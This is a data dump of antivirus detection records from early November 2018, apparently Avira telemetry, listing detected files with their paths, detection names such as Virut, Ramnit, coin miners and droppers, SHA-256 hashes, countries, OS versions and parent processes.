  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:05:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1531919\\noceduti.VIR', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T19:57:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205935-52a94e70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205935-52A94E70', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:40:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\SFWQEHQM\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d3c0', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d3c0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110428-685ca756', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-110409-586A93C2\\AVSCAN-20181104-110428-685CA756', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:04:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:53:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:20:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c8b40acb9e735aa4877fe1c9bdadadb1881d773d', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\c8b40acb9e735aa4877fe1c9bdadadb1881d773d', filesize=192000, name='TR/Crypt.ASPM.Gen.#M300.#R4504'), hash='ca9f504d95b5ba4b4aedff5612bfdbf4bbb9413be45bbf8e425eaedcfeba9ebd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-04T08:50:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T08:34:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:06:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='464wqw3az.exe', filepath='\\?\\C:\\Program Files\\E8NHFAYPF0\\464WQW3AZ.exe', filesize=1088000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='caaa9dbbd9f4903b95dcdf3950a0a123bdb438e849495b7deaa8c08e32d2a1e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='homflsox.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\HoMfLsOX.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203859-435b0c23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-203859-435B0C23', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msetres.dll', filepath='D:\\ip2770\\win\\RES\\MESSAGE\\Arabic\\MSetRes.Dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='7f3771d972e0cf876bf4b95757d8731ddfcea92a6fd5a5661a4ab19d821a9550', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T02:56:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7BAA98F4B13364D95285AAADDCE488A59C060804CB1C821D173BD7C56720B5D3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:55:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-02T15:41:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040330-8c167567', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_275196ea\\AVSCAN-20181102-035145-215BA771\\AVSCAN-20181102-040330-8C167567', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz87ee.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trz87EE.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:56:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsg4541.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jbolmncj.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\jBoLmnCJ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nst70E6.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='solidconverterpdf.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\solid converter pdf 7.3 build 1541\\solidconverterpdf.exe', filesize=2432000, name='W32/Stanit.#M1.#R1'), hash='abcd4f7fab8ff279901524929cf1e894964ed761eae6322e766d195c700cbb21', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141930-f3f324d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a11a97a5\\AVSCAN-20181102-141814-ED93650F\\AVSCAN-20181102-141930-F3F324D4', filesize=1536000, name='TR/BitCoinMiner.fxkbh.#M1.#R1'), hash='9bb685774ab6d6bb03a67bb3b4217ee9bf2dbadea7d5d2eb1865121811584b3b', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wtgdhfdr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wtgdHfdr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180616-3da8c091', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-175520-D81AA756\\AVSCAN-20181102-180616-3DA8C091', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b4ac50029c465ed3323b09edc040585f37aa11359f1d2eaf010ce059d90ae880', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:06:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162943-600cc565', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-162755-510CDF80\\AVSCAN-20181102-162943-600CC565', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='70t4_4.htm', filepath='J:\\progs\\office\\OfficeXPArabic\\ORK\\FILES\\PFILES\\ORKTOOLS\\ORK10\\ORK2000\\FIVE\\70T4_4.HTM', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='93a28ac7e41c7781fd432898f957a40b65756057f131afbbbc60ead805e9886b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:50:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p_crc16.exe', filepath='D:\\公司文件\\技术方案及资料\\crc16_delphi\\p_Crc16.exe', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='fccb70bb3f6a6ef2a2ac2100707c181afd5e10251d6f3e65cab225eb22c3dac5', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T06:43:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-225707-d494b90a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b51c409\\AVSCAN-20181102-225428-C3FA83A6\\AVSCAN-20181102-225707-D494B90A', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='e6e84c26e6e540487262c987a40d0b375bc27032a101445842e8441bad6703cb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\must4w54x21\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541098822.5bdb4d46121b8', country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Free\\606979846.exe', parentsize=671232, timestamp='2018-11-02T00:59:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='impreza.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\IMPREZA\\IMPREZA\\IMPREZA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='939ad03de3fb4174e701338fc1d26b157bdb72b1db5a0357aabfbfe3142c06ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (5).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:35:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T17:00:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_2197d7ba.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_2197d7ba.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:01:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ly1s0ue5ggi\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:24:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d04e', filepath='\\\\?\\C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d04e', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-204702-7c307869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-204702-7C307869', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:47:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135925-cef58d92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135925-CEF58D92', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214132-1974e7be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6400e8be\\AVSCAN-20181104-214121-177FA6EB\\AVSCAN-20181104-214132-1974E7BE', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:39:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002915e8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002915e8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:51:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b0e0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b0e0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297504', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297504', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:45:39Z'), dt=datetime.date(2018, 11, 4)),
